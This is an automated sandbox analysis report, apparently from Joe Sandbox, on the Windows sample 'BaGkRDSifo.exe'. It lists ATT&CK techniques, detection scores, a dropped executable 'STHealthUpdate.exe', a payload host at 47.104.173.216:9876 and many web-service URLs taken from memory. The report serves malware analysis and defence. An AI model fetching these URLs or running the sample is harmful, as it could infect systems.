Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	11 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	23 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
BaGkRDSifo.exe	28%	Virustotal		Browse
BaGkRDSifo.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Desktop\STHealthUpdate.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.adicon.com.cn/GetAllSampleListT	0%	Avira URL Cloud	safe
http://tempuri.org/QueryReport_PKIT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetSearchByteSampleToStringT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetJSONReportItemListByCustomerBarocdeT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetSearchByteSampleT	0%	Avira URL Cloud	safe
http://11.65.9.11:9082/jkda/webservice/DPService#	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/ExistsByYYtmT	0%	Avira URL Cloud	safe
http://tempuri.org/rm_RegionTransT	0%	Avira URL Cloud	safe
http://tempuri.org/DownloadBarCodeFlagT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetSearchByteSampleToStringT	0%	Virustotal		Browse
http://tempuri.org/rm_RegionTransT	1%	Virustotal		Browse
http://11.65.9.11:9082/jkda/webservice/DPService#	0%	Virustotal		Browse
http://www.adicon.com.cn/ExistsByYYtmT	0%	Virustotal		Browse
http://tempuri.org/QueryReport_PKIT	1%	Virustotal		Browse
http://www.adicon.com.cn/GetAllSampleListT	1%	Virustotal		Browse
http://www.adicon.com.cn/GetReportItemListByCustomerBarocdeT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/AppItemDownT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetJSONReportItemListByCustomerBarocdeT	0%	Virustotal		Browse
http://tempuri.org/UpLoadReportFromBytesNewT	0%	Avira URL Cloud	safe
http://tempuri.org/DownloadBarCodeFlagT	1%	Virustotal		Browse
http://www.adicon.com.cn/GetTsscInfoT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetJSONReportItemListByOtherCodeT	0%	Avira URL Cloud	safe
http://tempuri.org/DownloadReportT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetReportItemListByCustomerBarocdeT	0%	Virustotal		Browse
http://www.adicon.com.cn/ExistsReportByYYtmT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/AppItemDownT	0%	Virustotal		Browse
http://www.adicon.com.cn/UpdateMeiNianZuTaoT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetSearchByteSampleT	0%	Virustotal		Browse
http://www.adicon.com.cn/GetTsscInfoT	0%	Virustotal		Browse
http://tempuri.org/UpLoadReportFromBytesNewT	1%	Virustotal		Browse
http://www.adicon.com.cn/GetReportListT	0%	Avira URL Cloud	safe
http://tempuri.org/DownloadReportT	1%	Virustotal		Browse
http://www.adicon.com.cn/GetSearchByteSampleByOtherT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetBLTCTPicByYYTMT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/ExistsReportByYYtmT	0%	Virustotal		Browse
http://www.adicon.com.cn/AppUpdateInfoT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetJSONReportItemListByOtherCodeT	1%	Virustotal		Browse
http://www.adicon.com.cn/GetTsscInfoByAdiconBarcodeT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/UpdateMeiNianZuTaoT	0%	Virustotal		Browse
http://www.adicon.com.cn/GetReportListT	1%	Virustotal		Browse
http://www.adicon.com.cn/GetReportItemListByCustomerBarocde_MeiNianT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/AppBarcodeStateT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetSearchByteSampleByOtherT	1%	Virustotal		Browse
http://tempuri.org/addInspectReqT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/SetSampleDownFlagByAdiconBarocdeT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetTsscInfoByAdiconBarcodeT	0%	Virustotal		Browse
http://www.adicon.com.cn/AppUpdateInfoT	0%	Virustotal		Browse
http://www.adicon.com.cn/ValiUserT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetReportItemListByCustomerBarocde_MeiNianT	0%	Virustotal		Browse
http://www.adicon.com.cn/AppBarcodeStateT	0%	Virustotal		Browse
http://www.adicon.com.cn/SetSampleDownFlagByAdiconBarocdeT	0%	Virustotal		Browse
http://www.adicon.com.cn/GetSearchStringSampleByAdiconCodeT	0%	Virustotal		Browse
http://www.adicon.com.cn/GetBLTCTPicByYYTMT	0%	Virustotal		Browse
http://tempuri.org/addInspectReqT	1%	Virustotal		Browse
http://tempuri.org/DownloadReportFormIDListByClientBarcodeNoT	1%	Virustotal		Browse
http://tempuri.org/DownloadReportFormIDListByClientBarcodeNoT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetSearchStringSampleByAdiconCodeT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetTsscPicByAdiconBarcodeT	0%	Avira URL Cloud	safe
http://com.wondersgroup.jkda.application.modules.webservice	0%	Avira URL Cloud	safe
http://tempuri.org/DownloadReportFormIDListByBarcodeNoT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/UpLoadXmlT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/ReportDetailForHzqbT	0%	Avira URL Cloud	safe
http://tempuri.org/UpgradeRequestFormT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetXmmcListT	0%	Avira URL Cloud	safe
http://tempuri.org/GetReportUriT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetTsscPicByAdiconBarcodeT	0%	Virustotal		Browse
http://tempuri.org/UpgradeRequestFormT	1%	Virustotal		Browse
http://www.adicon.com.cn/ReportDetailForHzqbT	0%	Virustotal		Browse
http://tempuri.org/DownloadReportFormIDListByBarcodeNoT	1%	Virustotal		Browse
http://www.adicon.com.cn/ValiUserT	0%	Virustotal		Browse
http://www.adicon.com.cn/GetReportItemListByAdiconBarocde_MeiNianT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/UpLoadXmlT	0%	Virustotal		Browse
http://47.104.173.216:	0%	Avira URL Cloud	safe
http://47.104.173.216:9876	0%	Avira URL Cloud	safe
http://tempuri.org/HelloWorldT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetSearchStringSampleByCustomerCodeToByteT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetXmmcListT	0%	Virustotal		Browse
http://www.adicon.com.cn/T	0%	Avira URL Cloud	safe
http://tempuri.org/GetReportUriT	1%	Virustotal		Browse
http://www.adicon.com.cn/GetSampleCountT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetReportItemListByAdiconBarocde_MeiNianT	0%	Virustotal		Browse
http://www.adicon.com.cn/LoginT	0%	Avira URL Cloud	safe
http://11.65.9.11:9082/jkda/webservice/DPService	0%	Avira URL Cloud	safe
http://tempuri.org/getPatResultNoXmlT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetByteReportT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetReportListV1T	0%	Avira URL Cloud	safe
http://com.wondersgroup.jkda.application.modules.webserviceTU	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/ExistsReportOtherT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetInputXmmcListT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetReportBaseInfoT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetSearchSampleT	0%	Avira URL Cloud	safe
http://tempuri.org/CheckUpLoadReportFromBytesT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetBLTCTPicByKeyIdT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/UpLoadOrDownLoadByXmlT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/DetailListT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetReportUserItemByYYTMT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetReportUserItemT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/AppUpLoadXmlT	0%	Avira URL Cloud	safe
http://www.adicon.com.cn/GetAllSampleList_MeiNianT	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://47.104.173.216:9876/server.txt	false	Avira URL Cloud: safe	unknown
http://47.104.173.216:9876/STHealthUpdate.exe	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.adicon.com.cn/GetJSONReportItemListByCustomerBarocdeT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/QueryReport_PKIT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetSearchByteSampleT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetAllSampleListT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetSearchByteSampleToStringT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://11.65.9.11:9082/jkda/webservice/DPService#	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/ExistsByYYtmT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/rm_RegionTransT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/DownloadBarCodeFlagT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetReportItemListByCustomerBarocdeT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/AppItemDownT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/UpLoadReportFromBytesNewT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetTsscInfoT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetJSONReportItemListByOtherCodeT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/DownloadReportT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/ExistsReportByYYtmT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/UpdateMeiNianZuTaoT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetReportListT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetSearchByteSampleByOtherT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetBLTCTPicByYYTMT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/AppUpdateInfoT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetTsscInfoByAdiconBarcodeT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetReportItemListByCustomerBarocde_MeiNianT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/AppBarcodeStateT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/addInspectReqT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/SetSampleDownFlagByAdiconBarocdeT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/ValiUserT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetSearchStringSampleByAdiconCodeT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/DownloadReportFormIDListByClientBarcodeNoT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
